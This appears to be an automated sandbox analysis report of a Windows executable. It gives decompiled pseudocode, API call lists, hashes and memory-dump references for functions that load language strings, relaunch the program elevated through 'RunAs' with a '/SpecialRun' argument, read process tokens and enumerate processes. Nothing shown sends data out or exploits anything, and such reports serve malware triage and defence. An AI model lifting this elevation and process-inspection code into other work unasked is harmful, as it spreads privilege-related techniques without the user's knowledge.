                                                                                                                                                                                                                          • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                                                                                                                          0x00406466
                                                                                                                                                                                                                          0x0040647d
                                                                                                                                                                                                                          0x00406484
                                                                                                                                                                                                                          0x00406499
                                                                                                                                                                                                                          0x004064a0
                                                                                                                                                                                                                          0x004064af
                                                                                                                                                                                                                          0x004064b4
                                                                                                                                                                                                                          0x004064bb
                                                                                                                                                                                                                          0x004064cd
                                                                                                                                                                                                                          0x004064d2
                                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                                          0x004064ea
                                                                                                                                                                                                                          0x004064ea
                                                                                                                                                                                                                          0x004064f3
                                                                                                                                                                                                                          0x00406503
                                                                                                                                                                                                                          0x00406514
                                                                                                                                                                                                                          0x00406525
                                                                                                                                                                                                                          0x0040653b
                                                                                                                                                                                                                          0x0040654e
                                                                                                                                                                                                                          0x00406568
                                                                                                                                                                                                                          0x00406572
                                                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                                                          0x00406582
                                                                                                                                                                                                                          0x0040658a
                                                                                                                                                                                                                          0x00406596

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406484
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004064A0
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                            • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064E4
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004064F3
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00406503
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040657A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                                                                          • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                          • API String ID: 3037099051-2314623505
                                                                                                                                                                                                                          • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                                                                                                                                                          0x00401c31
                                                                                                                                                                                                                          0x00401c33
                                                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                                                          0x00401c61
                                                                                                                                                                                                                          0x00401c68
                                                                                                                                                                                                                          0x00401c74
                                                                                                                                                                                                                          0x00401c79
                                                                                                                                                                                                                          0x00401c7a
                                                                                                                                                                                                                          0x00401c7b
                                                                                                                                                                                                                          0x00401c84
                                                                                                                                                                                                                          0x00401c89
                                                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                                                          0x00401c9b
                                                                                                                                                                                                                          0x00401ca6
                                                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                                                          0x00401cb9
                                                                                                                                                                                                                          0x00401cc0
                                                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                                                          0x00401cce
                                                                                                                                                                                                                          0x00401cd5
                                                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                                          0x00401d14
                                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                                                          0x00401cf3
                                                                                                                                                                                                                          0x00401cfe
                                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                                          0x00401cfe
                                                                                                                                                                                                                          0x00401d1b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C68
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                                                                          • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                                                                          • API String ID: 903100921-3385179869
                                                                                                                                                                                                                          • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                                                          0x00409ab7
                                                                                                                                                                                                                          0x00409ac8
                                                                                                                                                                                                                          0x00409acf
                                                                                                                                                                                                                          0x00409ad4
                                                                                                                                                                                                                          0x00409ae0
                                                                                                                                                                                                                          0x00409ae6
                                                                                                                                                                                                                          0x00409ae8
                                                                                                                                                                                                                          0x00409af0
                                                                                                                                                                                                                          0x00409c3a
                                                                                                                                                                                                                          0x00409c41
                                                                                                                                                                                                                          0x00409c67
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c67
                                                                                                                                                                                                                          0x00409c49
                                                                                                                                                                                                                          0x00409c50
                                                                                                                                                                                                                          0x00409c51
                                                                                                                                                                                                                          0x00409c56
                                                                                                                                                                                                                          0x00409c57
                                                                                                                                                                                                                          0x00409c5a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c64
                                                                                                                                                                                                                          0x00409b00
                                                                                                                                                                                                                          0x00409b03
                                                                                                                                                                                                                          0x00409b06
                                                                                                                                                                                                                          0x00409b0b
                                                                                                                                                                                                                          0x00409b10
                                                                                                                                                                                                                          0x00409ba9
                                                                                                                                                                                                                          0x00409bac
                                                                                                                                                                                                                          0x00409bc1
                                                                                                                                                                                                                          0x00409bc7
                                                                                                                                                                                                                          0x00409bcc
                                                                                                                                                                                                                          0x00409bd8
                                                                                                                                                                                                                          0x00409bf0
                                                                                                                                                                                                                          0x00409bf2
                                                                                                                                                                                                                          0x00409c23
                                                                                                                                                                                                                          0x00409c26
                                                                                                                                                                                                                          0x00409c2f
                                                                                                                                                                                                                          0x00409c34
                                                                                                                                                                                                                          0x00409c34
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c2f
                                                                                                                                                                                                                          0x00409bf7
                                                                                                                                                                                                                          0x00409bfb
                                                                                                                                                                                                                          0x00409c02
                                                                                                                                                                                                                          0x00409c06
                                                                                                                                                                                                                          0x00409c0d
                                                                                                                                                                                                                          0x00409c14
                                                                                                                                                                                                                          0x00409c17
                                                                                                                                                                                                                          0x00409c18
                                                                                                                                                                                                                          0x00409c1b
                                                                                                                                                                                                                          0x00409c1e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409c1e
                                                                                                                                                                                                                          0x00409b1f
                                                                                                                                                                                                                          0x00409b25
                                                                                                                                                                                                                          0x00409b2a
                                                                                                                                                                                                                          0x00409b2d
                                                                                                                                                                                                                          0x00409b33
                                                                                                                                                                                                                          0x00409b3d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b4b
                                                                                                                                                                                                                          0x00409b53
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b6a
                                                                                                                                                                                                                          0x00409b6c
                                                                                                                                                                                                                          0x00409b6e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409b77
                                                                                                                                                                                                                          0x00409b7b
                                                                                                                                                                                                                          0x00409b82
                                                                                                                                                                                                                          0x00409b86
                                                                                                                                                                                                                          0x00409b8d
                                                                                                                                                                                                                          0x00409b8e
                                                                                                                                                                                                                          0x00409b94
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409BC7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                                                                                                                          • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                                                                                                                          • API String ID: 3504373036-27875219
                                                                                                                                                                                                                          • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                                                                                                                          0x00409179
                                                                                                                                                                                                                          0x00409209
                                                                                                                                                                                                                          0x00409209
                                                                                                                                                                                                                          0x00409185
                                                                                                                                                                                                                          0x0040918a
                                                                                                                                                                                                                          0x0040918f
                                                                                                                                                                                                                          0x00409208
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409191
                                                                                                                                                                                                                          0x0040919e
                                                                                                                                                                                                                          0x004091a2
                                                                                                                                                                                                                          0x004091a7
                                                                                                                                                                                                                          0x004091af
                                                                                                                                                                                                                          0x004091b3
                                                                                                                                                                                                                          0x004091b8
                                                                                                                                                                                                                          0x004091c0
                                                                                                                                                                                                                          0x004091c4
                                                                                                                                                                                                                          0x004091c9
                                                                                                                                                                                                                          0x004091d1
                                                                                                                                                                                                                          0x004091d5
                                                                                                                                                                                                                          0x004091da
                                                                                                                                                                                                                          0x004091e2
                                                                                                                                                                                                                          0x004091e6
                                                                                                                                                                                                                          0x004091eb
                                                                                                                                                                                                                          0x004091ed
                                                                                                                                                                                                                          0x004091ed
                                                                                                                                                                                                                          0x004091eb
                                                                                                                                                                                                                          0x004091da
                                                                                                                                                                                                                          0x004091c9
                                                                                                                                                                                                                          0x004091b8
                                                                                                                                                                                                                          0x004091ff
                                                                                                                                                                                                                          0x00409202
                                                                                                                                                                                                                          0x00409202
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004091ff

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1182944575-70141382
                                                                                                                                                                                                                          • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                                                                                          0x004090f5
                                                                                                                                                                                                                          0x00409171
                                                                                                                                                                                                                          0x00409171
                                                                                                                                                                                                                          0x004090fd
                                                                                                                                                                                                                          0x00409103
                                                                                                                                                                                                                          0x00409107
                                                                                                                                                                                                                          0x00409170
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409170
                                                                                                                                                                                                                          0x00409116
                                                                                                                                                                                                                          0x0040911a
                                                                                                                                                                                                                          0x0040911f
                                                                                                                                                                                                                          0x00409127
                                                                                                                                                                                                                          0x0040912b
                                                                                                                                                                                                                          0x00409130
                                                                                                                                                                                                                          0x00409138
                                                                                                                                                                                                                          0x0040913c
                                                                                                                                                                                                                          0x00409141
                                                                                                                                                                                                                          0x00409149
                                                                                                                                                                                                                          0x0040914d
                                                                                                                                                                                                                          0x00409152
                                                                                                                                                                                                                          0x0040915a
                                                                                                                                                                                                                          0x0040915e
                                                                                                                                                                                                                          0x00409163
                                                                                                                                                                                                                          0x00409165
                                                                                                                                                                                                                          0x00409165
                                                                                                                                                                                                                          0x00409163
                                                                                                                                                                                                                          0x00409152
                                                                                                                                                                                                                          0x00409141
                                                                                                                                                                                                                          0x00409130
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
